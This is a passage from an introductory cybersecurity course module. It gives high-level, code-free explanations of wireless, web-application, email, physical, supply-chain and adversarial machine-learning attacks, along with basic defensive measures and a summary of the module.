In order to successfully jam the signal, the frequency, modulation and power of the RF
jammer needs to be equal to that of the device that the attacker is seeking to disrupt.

1.4.5 Avatar

You have probably heard of Bluetooth but do you know exactly what it is and how it
works?

Bluetooth is a short-range, low-power protocol that transmits data in a personal area

network (PAN) and uses pairing to establish a relationship between devices such as
mobiles, laptops and printers. Cybercriminals have discovered ways to exploit the
vulnerabilities between these connections.

1.4.6 Bluejacking and Bluesnarfing

Due to the limited range of Bluetooth, an attacker must be within range of their target. Here
are some ways that they can exploit a target’s device without their knowledge.

Bluejacking uses wireless Bluetooth technology to send unauthorized messages or shocking

images to another Bluetooth device.

Bluesnarfing occurs when an attacker copies information, such as emails and contact lists,
from a target his device using Bluetooth connection.

1.4.7 Attacks Against Wi-Fi Protocols

Wired equivalent privacy (WEP) and Wi-Fi protected access (WPA) are security protocols
that were designed to secure wireless networks that are vulnerable to attacks.

WEP was developed to provide data transmitted over a wireless local area network
(WLAN) with a level of protection comparable to what is usually expected of a traditional
wired network. It added security to wireless networks by encrypting the data.

WEP used a key for encryption. The problem, however, was that WEP had no provision for
key management and so the number of people sharing the same key continually grew,
giving criminals access to a large amount of traffic data. Furthermore, WEP’s initialization
vector (IV), one of the key components of its encryption key, was too small, readable and
static.

To address this and replace WEP, WPA and then WPA2 were developed as improved
security protocols. Unlike with WEP, an attacker cannot recover WPA2’s encryption key
by observing network traffic. However, they can still use a packet sniffer to analyze the
packets going between an access point and a legitimate user.

1.4.9 Wi-Fi and Mobile Defense

There are several steps that organizations and users need to take to defend against wireless
and mobile device attacks. These include the following:

 Take advantage of basic wireless security features such as authentication and

encryption by changing the default configuration settings.
 Restrict access point placement by placing these devices outside the firewall or
within a demilitarized zone — a perimeter network that protects an organization’s
LAN from untrusted devices.
 Use WLAN tools such as NetStumbler to detect rogue access points or unauthorized
workstations.
 Develop a policy for guest access to an organization’s Wi-Fi network.
 Employees in an organization should use a remote access VPN for WLAN access.

1.5 Application Attacks

1.5.1 Avatar

Attacks carried out through web applications are becoming increasingly common.

They involve cybercriminals taking advantage of vulnerabilities in the coding of a web-

based application to gain access to a database or server. Let’s take a look at some examples.

1.5.2 Cross-Site Scripting

Cross-site scripting (XSS) is a common vulnerability found in many web applications. This
is how it works:

1. Cybercriminals exploit the XSS vulnerability by injecting scripts containing

malicious code into a web page.
2. The web page is accessed by the victim, and the malicious scripts unknowingly pass
to their browser.
3. The malicious script can access any cookies, session tokens or other sensitive
information about the user, which is sent back to the cybercriminal.
4. Armed with this information, the cybercriminal can impersonate the user.
1.5.3 Code Injection

Most modern websites use a database, such as a Structured Query Language (SQL) or an
Extensible Markup Language (XML) database, to store and manage data. Injection attacks
seek to exploit weaknesses in these databases.

XML injection attack

An XML injection attack can corrupt the data on the XML database and threaten the
security of the website.

It works by interfering with an application’s processing of XML data or query entered by a

user.

Cybercriminals can manipulate this query by programming it to suit their needs. This will
grant them access to all of the sensitive information stored on the database and allows them
to make any number of changes to the website.

SQL injection attack

Cybercriminals can carry out an SQL injection attack on websites or any SQL database by
inserting a malicious SQL statement in an entry field.

This attack takes advantage of a vulnerability in which the application does not correctly
filter the data entered by a user for characters in an SQL statement.

As a result, the cybercriminal can gain unauthorized access to information stored on the
database, from which they can spoof an identity, modify existing data, destroy data or even
become an administrator of the database server itself.
DLL injection attack

A dynamic link library (DLL) file is a library that contains a set of code and data for
carrying out a particular activity in Windows. Applications use this type of file to add
functionality that is not built-in, when they need to carry out this activity.

DLL injection allows a cybercriminal to trick an application into calling a malicious DLL
file, which executes as part of the target process.

LDAP injection attack

The Lightweight Directory Access Protocol (LDAP) is an open protocol for authenticating
user access to directory services.

An LDAP injection attack exploits input validation vulnerabilities by injecting and

executing queries to LDAP servers, giving cybercriminals an opportunity to extract
sensitive information from an organization’s LDAP directory.

1.5.4 Buffer Overflow

Buffers are memory areas allocated to an application. A buffer overflow occurs when data
is written beyond the limits of a buffer. By changing data beyond the boundaries of a
buffer, the application can access memory allocated to other processes. This can lead to a
system crash or data compromise, or provide escalation of privileges.

These memory flaws can also give attackers complete control over a target’s device. For
example, an attacker can change the instructions of a vulnerable application while the
program is loading in memory and, as a result, can install malware and access the internal
network from the infected device.

1.5.5 Avatar

Did you know that research carried out by Carnegie Mellon University estimates that nearly
half of all exploits of computer programs stem from some form of buffer overflow?

1.5.6 Remote Code Executions

Remote code execution allows a cybercriminal to take advantage of application

vulnerabilities to execute any command with the privileges of the user running the
application on the target device.

Privilege escalation exploits a bug, design flaw or misconfiguration in an operating system

or software application to gain access to resources that are normally restricted.
Select the image to find out more about the Metasploit Project and this community’s white
hat cybersecurity tools.

Metasploit

The Metasploit Project is a computer security project that provides information about
security vulnerabilities and aids penetration testing. Among the tools they have developed
is the Metasploit Framework, which can be used for developing and executing exploit code
against a remote target.

Meterpreter, in particular, is a payload within Metasploit that allows users to take control of
a target his device by writing their own extensions and uploading these files into a running
process on the device. These files are loaded and executed from memory, so they never
involve the hard drive. This means that such files fly under the radar of antivirus detection.

Meterpeter also has a module for controlling a remote system his webcam. Once
Meterpreter is installed on a target device, the Metasploit user can view and capture images
form the target his webcam.

1.5.7 Other Application Attacks

Every piece of information that an attacker receives about a targeted system or application
can be used as a valuable weapon for launching a dangerous attack.

Cross-site request forgery (CSRF)

CSRF describes the malicious exploit of a website where unauthorized commands are
submitted from a user’s browser to a trusted web application.

A malicious website can transmit such commands through specially-crafted image tags,
hidden forms or JavaScript requests — all of which can work without the user’s
knowledge.

Race condition attack

Also known as a time of check (TOC) or a time of use (TOU) attack, a race condition
attack happens when a computing system that is designed to handle tasks in a specific
sequence is forced to perform two or more operations simultaneously.

For example, operating systems are made up of threads — the smallest sequence of
program instructions required to carry out a process. When two or more threads access
shared data and try to change it at the exact same time, a race condition attack occurs.

Improper input handling attack

Data inputted by a user that is not properly validated can affect the data flow of a program
and cause critical vulnerabilities in systems and applications that result in buffer overflow
or SQL injection attacks.

Error handling attack

Attackers can use error messages to extract specific information such as the hostnames of
internal systems and directories or files that exist on a given web server — as well as
database, table and field names that can be used to craft SQL injection attacks.

Application programming interface (API) attack

An API delivers a user response to a system and sends the system’s response back to the
user. An API attack occurs when a cybercriminal abuses an API endpoint.

Replay attack

This describes a situation where a valid data transmission is maliciously or fraudulently

repeated or delayed by an attacker, who intercepts, amends and resubmits the data to get the
receiver to do whatever they want.

Directory traversal attack

Directory traversal occurs when an attacker is able to read files on the webserver outside of
the directory of the website. An attacker can then use this information to download server
configuration files containing sensitive information, potentially expose more server
vulnerabilities or even take control of the server!

Resource exhaustion attacks

These attacks are computer security exploits that crash, hang or otherwise interfere with a
targeted program or system. Rather than overwhelming network bandwidth like a DoS
attack, resource exhaustion attacks overwhelm the hardware resources available on the
target’s server instead.

1.5.9 Defending Against Application Attacks

There are several actions that you can take to defend against an application attack. You will
find some of them outlined here.

 The first line of defense against an application attack is to write solid code.
 Prudent programming practice involves treating and validating all input from
outside of a function as if it is hostile.
 Keep all software, including operating systems and applications, up to date and do
not ignore update prompts. Remember that not all programs update automatically.
1.5.10 Avatar

Email is used by billions of people worldwide and, as a result, has become a major
vulnerability to users and organizations.

1.5.11 Spam

Spam, also known as junk mail, is simply unsolicited email. In most cases, it is a method of
advertising. However, a lot of spam is sent in bulk by computers infected by viruses or
worms — and often contains malicious links, malware or deceptive content that aims to
trick recipients into disclosing sensitive information, such as a social security number or
bank account information.

Almost all email providers filter spam, but it still consumes bandwidth. And even if you
have security features implemented, some spam might still get through to you. Look out for
the following indicators of spam:

 The email has no subject line.

 The email asks you to update your account details.
 The email text contains misspelled words or strange punctuation.
 Links within the email are long and/or cryptic.
 The email looks like correspondence from a legitimate business, but there are tiny
differences — or it contains information that does not seem relevant to you.
 The email asks you to open an attachment, often urgently.

If you receive an email that contains one or more of these indicators, you should not open
the email or any attachments. Many organizations have an email policy that requires
employees to report receipt of this type of email to their cybersecurity team for further
investigation. If in doubt, always report.

1.5.12 Phishing

Phishing is a form of fraudulent activity often used to steal personal information.

Phishing occurs when a user is contacted by email or instant message or in any other way
by someone masquerading as a legitimate person or organization. The intent is to trick the
recipient into installing malware on their device or into sharing personal information, such
as login credentials or financial information.

For example, you receive an email congratulating you for winning a prize. It looks like it
was sent from a well-known retail store and asks you to click on a link to claim tyour prize.
This link may in fact redirect you to a fake site that asks you to enter your personal details,
or it may even install a virus on your device.

Spear phishing
A highly targeted attack, spear pishing sends customized emails to a specific person based
on information the attacker knows about them, which could be their interest, preferences,
activities and work projects.

For example, a cybercriminal discovers through their research that you are looking to buy a
specific model of car. The cybercriminal joins a car discussion forum you are a member of,
forges a car sale offering and sends you an email that contains a link to see pictures of the
car. When you click on the link, you unknowingly install malware on your device.

1.5.13 Vishing, Pharming and Whaling

Criminals make use of a wide range of techniques to try to gain access to your personal
information.

Vishing

Often referred to as voice phishing, this type of attack sees criminals use voice
communication technology to encourage users to divulge information, such as their credit
card details.

Criminals can spoof phone calls using voice over internet protocol (VoIP), or leave
recorded messages to give the impression that they are legitimate callers.

Pharming

This type of attack deliberately misdirects users to a fake version of an official website.
Tricked into believing that they are connected to a legitimate site, users enter their
credentials into the fraudulent website.

Whaling

Whaling is a phishing attack that targets high profile individuals, such as senior executives
within an organization, politicians and celebrities.

1.5.15 Defending Against Email and Browser Attacks

There are many actions that you can take to defend against email and browser attacks.
Some of the most important ones are outlined here.

It is difficult to stop spam, but there are ways to reduce its effects:

 Most Internet service providers (ISPs) filter spam before it reaches the user’s inbox.
 Many antivirus and email software programs automatically detect and remove
dangerous spam from an email inbox.
  Organizations should educate employees about the dangers of unsolicited emails
and make them aware of the dangers of opening attachments.
 Never assume that email attachments are safe, even when they come from a trusted
contact. Always scan attachments before opening them.

Become a member of the Anti-Phishing Working Group (APWG). It is an international

association of companies focused on eliminating identity theft and fraud resulting from
phishing and email spoofing.

All software should be kept up-to-date, with the latest security patches applied to protect
against any known security vulnerabilities.

1.5.16 Avatar

Phew! That’s a lot to take in. Cybercriminals can employ a range of tactics to get the
information they want. And we’re not done yet!

1.5.17 There's More...

Physical attacks

Physical attacks are intentional, offensive actions used to destroy, expose, alter, disable,
steal or gain unauthorized access to an organization’s infrastructure or hardware.

Examples of physical attacks include:

 Loading malware onto a USB flash drive that infects a device when plugged in.
 Fitting cables and plugs such as generic USB cables, mobile device charging cables
and wall or power adapters with advanced technologies, such as a wireless chip, to
allow an attacker to control or provide instructions to a device.
 Copying or skimming data from a credit or debit card using a specialized terminal to
create a cloned card, which can be used to gain unauthorized access to the victim’s
accounts.

Adversarial artificial intelligence attacks

Machine learning is a method of automation that allows devices to carry out analysis and
perform tasks without specifically being programmed to do so. It powers many of the
applications we use today, such as web searching, photo tagging, spam detection, video
surveillance, fraud detection and security automation.

Machine learning uses mathematical models to predict outcomes. However, these models
are dependent on the data that is inputted. If the data is tainted, it can have a negative
impact on the predicted outcome. Attackers can take advantage of this to perpetrate attacks
against machine learning algorithms. For example, using tainted data to trick an
autonomous vehicle into misinterpreting street signs.
Supply chain attacks

Many organizations interface with a third party for their systems management or to
purchase components and software. Organizations may even rely on parts or components
from a foreign source.

Attackers often find ways to intercept these supply chains. For example, software can be
based on specific support agreements and subject to an end-of-life (EOL) date. Changing
this date could mean that an organization is no longer eligible for service and maintenance
support.

Cloud-based attacks

Rather than developing systems on their own premises, more and more organizations are
making the move toward cloud-based computing, as we discussed earlier in this module.

The advantage is that the cloud provider will maintain the equipment but this also opens up
an organization to a host of potential threats. Attackers are constantly leveraging ways to
exploit sensitive data stored on the cloud, as well as applications, platforms and
infrastructure that is cloud-based, as we saw with SaaS, PaaS and IaaS.

1.6 Cybersecurity Threats, Vulnerabilities, and Attacks Summary

1.6.1 What Did I Learn in this Module?

Threat Domains

A threat domain is an area of control, authority, or protection that attackers can exploit to
gain access to a system. Cyber threat categories include software attacks and errors,
sabotage, human error, theft, hardware failures, utility interruption, and natural disasters.
Internal threats are usually carried out by current or former employees and other contract
partners. The source of an external threat typically stems from amateur or skilled attackers
who can exploit vulnerabilities in networked devices, or use social engineering techniques.
A user domain includes anyone with access to an organization’s information system.
Common user threats include poorly enforced security policies, data theft, unauthorized
downloads and media, unauthorized VPNs and websites, and destruction of systems,
applications, or data. Individual devices, LANs and private and public clouds are also
vulnerable to attack. There are complex threats such as an APT and an algorithm attack.
Cybercriminals use backdoor programs to gain unauthorized access to a system by
bypassing the normal authentication procedures. Backdoors grant cybercriminals continued
access to a system, even if the organization has fixed the original vulnerability used to
attack the system. Most rootkits exploit software vulnerabilities to gain access to resources
and modify system files. Rootkits can also modify system forensics and monitoring tools,
making them very hard to detect.
The dark web is encrypted web content that is not indexed by conventional search engines
and requires specific software, authorization, or configurations to access. IOCs such as
malware signatures or domain names provide evidence of security breaches. AIS enables
the real-time exchange of cybersecurity threat indicators using standardized and structured
languages called STIX and TAXII.

Deception

Social engineering is a non-technical strategy that attempts to manipulate individuals into

performing certain actions or divulging confidential information. Pretexting is when an
individual lies to gain access to privileged data. Quid pro quo attacks are a request for
personal information in exchange for something. Identity fraud is using a person’s stolen
identity to obtain goods or services by deception.

Social engineering tactics include impersonating an authority figure, intimidation,

consensus (“everyone is doing it”), pretending something is scarce or that a situation is
urgent, building familiarity and trust with an employee to eventually leverage that into
access. Shoulder surfing is looking over a target’s shoulder to gain valuable information
such as PINs, access codes or credit card details. Criminals do not always have to be near
their victim to shoulder surf, they can use binoculars or security cameras to obtain this
information. Dumpster diving is going through a target's trash to see what information has
been thrown out. Piggybacking or tailgating is when a criminal follows an authorized
person to gain physical entry into a secure location or a restricted area. Other methods of
deception include invoice scams, watering hole attacks, typosquatting, prepending, and
influence campaigns.

Organizations need to promote awareness of social engineering tactics and properly educate
employees on prevention measures.

Cyber Attacks

Malware is any code that can be used to steal data, bypass access controls, cause harm to or
compromise a system. A virus is a type of computer program that, when executed,
replicates, and attaches itself to other files by inserting its own code into it. A worm is a
malicious software program that replicates by independently exploiting vulnerabilities in
networks. A Trojan horse is malware that carries out malicious operations by masking its
true intent. A logic bomb is a malicious program that waits for a trigger to set off the
malicious code. Ransomware is designed to hold a computer system or the data it contains
captive until a payment is made. DoS attacks work by creating an overwhelming quantity
of traffic or by sending maliciously formatted packets that cannot be identified by an
application, causing the receiving device to run slowly or crash. DDoS attacks are similar
but originate from multiple coordinated sources. DNS attacks include spoofing and
hijacking.

Layer 2 attacks include MAC address, ARP and IP spoofing, MAC flooding, man-in-the-
middle, and man-in-the-mobile. Zero-Day attacks exploit software vulnerabilities before
they become known. Keyboard logging (keylogging) logs keystrokes and configures the
keylogger software to send the log file to the criminal. This log file can reveal usernames,
passwords, websites visited, etc.

To defend against these attacks use firewalls, stay current on upgrades and patches,
distribute the workload across server systems, and block external ICMP packets with
firewalls.

Wireless and Mobile Device Attacks

Grayware is an unwanted application that behaves in an annoying or undesirable manner.

SMiShing is fake text messages which prompt you to visit a malicious website or call a
fraudulent phone number, which may result in malware being downloaded onto your
device. A rogue access point is a wireless access point installed on a secure network
without authorization. An evil twin attack is where the attacker’s access point is set up to
look like a better connection option. Radio frequency jamming is deliberately jamming the
transmission of a radio or satellite station to prevent a wireless signal from reaching the
receiving station.

Bluejacking sends unauthorized messages or shocking images to another Bluetooth device.

Bluesnarfing is when an attacker copies information from a target’s device using Bluetooth.
WEP and WPA are security protocols that were designed to secure wireless networks.
WPA2 is an improved security protocol. Unlike WEP, an attacker cannot recover WPA2’s
encryption key by observing network traffic.

To defend against wireless and mobile device attacks: change default configurations.
Restrict access point placement by placing these devices outside the firewall or in a DMZ.
Use WLAN tools to detect rogue access points or unauthorized workstations. Have a policy
for guest access to a Wi-Fi network. Employees should use a remote access VPN for
WLAN access.

Application and Other Attacks

XSS is a vulnerability found in many web applications. Types of Code Injection attacks
include XML, SQL, DLL, and LDAP. A buffer overflow occurs when data is written
beyond the limits of a buffer. Remote code execution is exploiting application
vulnerabilities to execute any command with the privileges of the authorized user. Other
application attacks include CSRF, race condition, improper input handling, error handling,
API, replay, directory traversal, and resource exhaustion.

Write solid code to defend against an application attack. Treat and validate all input from
outside of a function as if it is hostile. Keep all software up to date. Spam is unsolicited
email that is usually a method of advertising. Some spam is sent in bulk by computers
infected with viruses or worms. Phishing is when a user is contacted using email or instant
message by a threat actor masquerading as a legitimate person. Spear phishing sends
customized emails to a specific person based on information the attacker knows about
them. Other common scams include vishing, pharming, and whaling. Other types of attacks
include physical attacks to equipment, adversarial AI attacks, supply chain attacks and
cloud-based attacks.

Use antivirus software to defend against email and browser attacks. Never assume that
email attachments are safe. Always scan attachments before opening them. Become a
member of the Anti-Phishing Working Group (APWG). All software should be kept up-to-
date.